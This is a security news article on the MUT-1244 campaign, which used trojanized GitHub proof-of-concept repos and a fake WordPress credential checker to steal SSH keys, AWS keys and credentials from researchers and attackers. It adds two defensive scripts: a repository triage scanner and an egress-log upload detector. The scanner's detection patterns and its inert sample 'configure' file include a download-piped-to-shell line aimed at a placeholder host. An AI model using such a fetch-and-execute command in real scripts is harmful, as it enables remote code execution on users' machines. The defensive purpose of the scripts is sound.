A threat actor tracked as MUT-1244 has stolen over 390,000 WordPress credentials in a large-scale, year-long campaign targeting other threat actors with a trojanized WordPress credentials checker.
Researchers at Datadog Security Labs, who spotted the attacks, say that SSH private keys and AWS access keys were also stolen from the compromised systems of hundreds of other victims, believed to include red teamers, penetration testers, and security researchers, as well as malicious actors.
The victims were infected using the same second-stage payload, pushed through dozens of trojanized GitHub repositories delivering malicious proof-of-concept (PoC) exploits for known security flaws, and through a phishing campaign that prompted targets to install a fake kernel upgrade disguised as a CPU microcode update.
While the phishing emails tricked victims into executing commands that installed the malware, the fake repositories duped security professionals and threat actors searching for exploit code for specific vulnerabilities.
Threat actors have used fake proof-of-concept exploits in the past to target researchers, hoping to steal valuable research or gain access to the networks of cybersecurity firms.
“Due to their naming, several of these repositories are automatically included in legitimate sources, such as Feedly Threat Intelligence or Vulnmon, as proof-of-concept repositories for these vulnerabilities,” the researchers said. “This increases their look of legitimacy and the likelihood that someone will run them.”
The payloads were dropped via the GitHub repos using several methods, including backdoored configure compilation files, malicious PDF files, Python droppers, and malicious npm packages included in the projects’ dependencies.
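The four delivery methods listed above are all things a researcher can look for before building or installing a PoC. The following triage script is an added example written for this article; it is not Datadog's tooling and not code from the campaign. It walks a checkout and flags npm lifecycle hooks, configure/Makefile or shell scripts that fetch-and-execute, Python files that spawn processes or reach the network, and PDFs that carry active content. The regexes are assumed heuristics rather than the campaign's indicators, and the sample repository it scans is constructed inline and never executed.

```python
"""Pre-execution triage of a freshly cloned proof-of-concept repository.

Added example; not Datadog's tooling and not code from the campaign. It walks a
checkout and flags the delivery mechanisms the article lists: npm lifecycle
scripts, configure/Makefile or shell scripts that fetch-and-execute, Python
files that spawn processes or phone home, and PDFs carrying active content.
The regexes are assumed heuristics, not the campaign's indicators."""
import json
import re
import tempfile
from pathlib import Path

# Assumed heuristics for shell-style files (configure scripts, Makefiles, *.sh).
SHELL_PATTERNS = [
    re.compile(r"(curl|wget)[^\n|]*\|\s*(ba)?sh\b"),  # download piped straight into a shell
    re.compile(r"base64\s+(-d|--decode)"),             # decode-then-run staging
    re.compile(r"\beval\s"),                           # dynamic evaluation of built strings
]
# Assumed heuristics for Python files (droppers, setup.py install hooks).
PYTHON_PATTERNS = [
    re.compile(r"subprocess\.|os\.system\(|os\.popen\("),                    # process spawning
    re.compile(r"urllib\.request|requests\.(get|post)\(|socket\.socket\("),  # network I/O
    re.compile(r"cmdclass\s*="),                                              # custom setup.py commands
]
PDF_MARKERS = [b"/JavaScript", b"/OpenAction", b"/Launch", b"/AA"]
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SHELL_NAMES = {"configure", "configure.ac", "Makefile", "Makefile.am", "Makefile.in"}


def scan_repo(root):
    """Return a list of (relative_path, reason) findings for every file under root."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name == "package.json":
            try:
                scripts = json.loads(path.read_text(errors="replace")).get("scripts", {})
            except (ValueError, AttributeError):
                scripts = {}
            for hook in NPM_HOOKS:
                if hook in scripts:
                    findings.append((rel, f"npm lifecycle hook '{hook}': {scripts[hook]}"))
        elif path.suffix.lower() == ".pdf":
            data = path.read_bytes()
            for marker in PDF_MARKERS:
                if marker in data:
                    findings.append((rel, f"PDF active-content marker {marker.decode()}"))
        elif path.suffix == ".py":
            text = path.read_text(errors="replace")
            for pat in PYTHON_PATTERNS:
                if pat.search(text):
                    findings.append((rel, f"python matches /{pat.pattern}/"))
        elif path.name in SHELL_NAMES or path.suffix == ".sh":
            text = path.read_text(errors="replace")
            for pat in SHELL_PATTERNS:
                if pat.search(text):
                    findings.append((rel, f"shell matches /{pat.pattern}/"))
    return findings


def build_sample_repo():
    """Write a constructed, inert checkout that mimics the article's delivery methods.
    Nothing here is executed; the files are only read by scan_repo()."""
    root = Path(tempfile.mkdtemp(prefix="poc_triage_"))
    (root / "package.json").write_text(json.dumps({
        "name": "cve-0000-00000-poc",                  # constructed placeholder name
        "scripts": {"postinstall": "node setup.js"},   # would run on `npm install`
    }))
    (root / "configure").write_text(
        "#!/bin/sh\n# constructed: looks like autoconf output, but stages a download\n"
        "curl -s http://example.invalid/stage | sh\n")
    (root / "poc.py").write_text("import subprocess\nsubprocess.run(['id'])\n")
    (root / "README.pdf").write_bytes(b"%PDF-1.4\n1 0 obj << /OpenAction 2 0 R >>\n")
    (root / "clean.sh").write_text("#!/bin/sh\necho building\n")  # benign control file
    return root


if __name__ == "__main__":
    for rel, reason in scan_repo(build_sample_repo()):
        print(f"{rel}: {reason}")
```

Run it against a real clone with `scan_repo("/path/to/checkout")`; a hit is a reason to read the flagged file in an editor, not proof of malice, since legitimate build systems also use `eval` and network access. The point is that none of these files should be run, and `npm install` should not be invoked, until each finding has been explained.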
As Datadog Security Labs found, this campaign overlaps with one highlighted in a November Checkmarx report about a year-long supply-chain attack in which the “hpc20235/yawpp” GitHub project was trojanized using malicious code in the “0xengine/xmlrpc” npm package to steal data and mine Monero cryptocurrency.
Malware deployed in these attacks includes a cryptocurrency miner and a backdoor that helped MUT-1244 collect and exfiltrate private SSH keys, AWS credentials, environment variables, and the contents of key directories such as “~/.aws”.
The second-stage payload, hosted on a separate platform, allowed the attackers to exfiltrate data to file-sharing services such as Dropbox and file.io; the investigators found hardcoded credentials for these platforms inside the payload, giving the attackers easy access to the stolen data.
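Because the exfiltration path runs through public file-sharing services, egress logs are a practical place to catch it. The detector below is an added example, not part of the Datadog report: it aggregates upload volume per internal host to a watched set of Dropbox and file.io endpoints and reports sources that exceed a threshold. The log line layout, the watched host list and the sample lines are all assumptions constructed here.

```python
"""Spot bulk uploads to consumer file-sharing services in egress proxy logs.

Added example, not from the Datadog report: the report says stolen data was
pushed to Dropbox and file.io, so one detection is "which internal hosts sent
data to those services, how much, and to which endpoint". The log format, the
watched host list and the sample lines are all assumptions constructed here."""
import re
from collections import defaultdict

# Assumed: endpoints that developer workstations and build hosts normally
# have no business uploading to.
WATCHED_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com", "file.io"}
UPLOAD_METHODS = {"POST", "PUT"}

# Assumed line layout: "<timestamp> <src_ip> <method> <url> <status> <bytes_sent>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+"
    r"https?://(?P<host>[^/\s:]+)\S*\s+(?P<status>\d{3})\s+(?P<bytes>\d+)$"
)


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes"] = int(rec["bytes"])
    return rec


def find_uploads(lines, min_bytes=1024):
    """Aggregate upload volume per source to watched hosts.

    Returns {src_ip: {"bytes": total, "hosts": sorted destinations}} for sources
    whose cumulative upload volume reaches min_bytes; small API calls such as
    auth checks stay below the threshold by design."""
    totals = defaultdict(int)
    hosts = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] not in UPLOAD_METHODS:
            continue
        host = rec["host"].lower()
        if host in WATCHED_HOSTS:
            totals[rec["src"]] += rec["bytes"]
            hosts[rec["src"]].add(host)
    return {
        src: {"bytes": total, "hosts": sorted(hosts[src])}
        for src, total in totals.items() if total >= min_bytes
    }


# Constructed sample log: one workstation pushing a sizeable blob to Dropbox and
# file.io right after fetching a PoC repo, and one doing only small API calls.
SAMPLE_LOG = """\
2024-11-02T10:15:01Z 10.0.0.21 GET https://github.com/example/poc-repo 200 512
2024-11-02T10:15:09Z 10.0.0.21 POST https://content.dropboxapi.com/2/files/upload 200 48213
2024-11-02T10:15:12Z 10.0.0.21 POST https://file.io/ 200 9001
2024-11-02T10:16:00Z 10.0.0.44 GET https://www.dropbox.com/ 200 3000
2024-11-02T10:16:30Z 10.0.0.44 POST https://api.dropboxapi.com/2/users/get_current_account 200 120
"""

if __name__ == "__main__":
    for src, info in find_uploads(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {info['bytes']} bytes to {', '.join(info['hosts'])}")
```

The threshold is the tuning knob: on a network where Dropbox is sanctioned, raise `min_bytes` or restrict `WATCHED_HOSTS` to file.io and similar anonymous drop services, and correlate hits with the fetch of a fresh GitHub repository by the same source shortly before.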
“MUT-1244 was able to gain access to over 390,000 credentials, believed to be WordPress ones. We assess with high confidence that before these credentials were exfiltrated to Dropbox, they were in the hands of offensive actors, who likely acquired them through illicit means,” Datadog Security Labs researchers said.
“These actors were then compromised through the yawpp tool they used to check the validity of these credentials. Since MUT-1244 advertised yawpp as a ‘credentials checker’ for WordPress, it’s no surprise that an attacker with a set of stolen credentials (which are often purchased from underground markets as a way to speed up threat actor operations) would use yawpp to validate them.”
The attackers successfully exploited trust within the cybersecurity community to compromise dozens of machines belonging to both white-hat and black-hat hackers after the targets unknowingly executed the threat actor’s malware, leading to data theft that included SSH keys, AWS access tokens, and command histories.
Datadog Security Labs estimates that hundreds of systems remain compromised, and others are still getting infected as part of this ongoing campaign.